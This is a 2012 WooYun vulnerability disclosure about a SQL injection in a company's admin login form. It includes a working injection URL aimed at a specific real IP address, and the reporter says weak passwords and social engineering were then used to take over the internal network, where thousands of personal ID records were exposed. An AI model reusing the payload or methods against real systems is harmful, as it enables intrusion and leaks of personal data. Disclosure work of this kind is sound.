当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010181

漏洞标题:亚太宏图sql注入漏洞导致整个内网沦陷

相关厂商:亚太宏图

漏洞作者: sql

提交时间:2012-07-26 18:08

修复时间:2012-09-09 18:08

公开时间:2012-09-09 18:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-26: 细节已通知厂商并且等待厂商处理中
2012-07-30: 厂商已经确认,细节仅向厂商公开
2012-08-09: 细节向核心白帽子及相关领域专家公开
2012-08-19: 细节向普通白帽子公开
2012-08-29: 细节向实习白帽子公开
2012-09-09: 细节向公众公开

简要描述:

后台登陆框 用户名没有做好过滤,导致sql注入的产生。数据库权限为sa.
敏感资料很多,还有 某石油勘探总院的 很多敏感资料 全部的身份证 真实姓名 单位 等等上千条。

详细说明:




sqlserver2005 降权了,sa是network 权限。 所以虽然是sa 但也不是秒日的,web目录不好找。反正后来日进去了,内网大都有弱口令 或者收集信息后社工都可以日。
敏感资料很多,还有 某石油勘探总院的 很多敏感资料 全部的身份证 真实姓名 单位 等等上千条。


漏洞证明:

http://218.241.82.76:809/login.aspx?__VIEWSTATE=%2FwEPDwUJNDIwODM5NjI3ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUOSW1hZ2VCdXR0b25hZGQFEUltYWdlQnV0dG9uY2FuY2VsdHEjS1OOsRe7DTl1ii%2Fn0YINLuk%3D&PassWord=11&__EVENTVALIDATION=%2FwEWBQLk0oDzDAKvruq2CAKyxeCRDwK5qL%2BRCQLt%2FIb7DKvt6QxwNqi5acAbk3TdJYzxFedG&ImageButtonadd.x=47&ImageButtonadd.y=13&UserName=admin'%20and%201=@@version%20and%20'a'='a

修复方案:

都喜欢说:你比我懂,我也说。

版权声明:转载请注明来源 sql@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2012-07-30 20:06

厂商回复:

CNVD确认并复现部分所述情况,由CNVD直接联系涉事单位处置。
按完全影响机密性,部分影响完整性进行评分,rank=8.47*1.0*1.1=9.317

最新状态:

暂无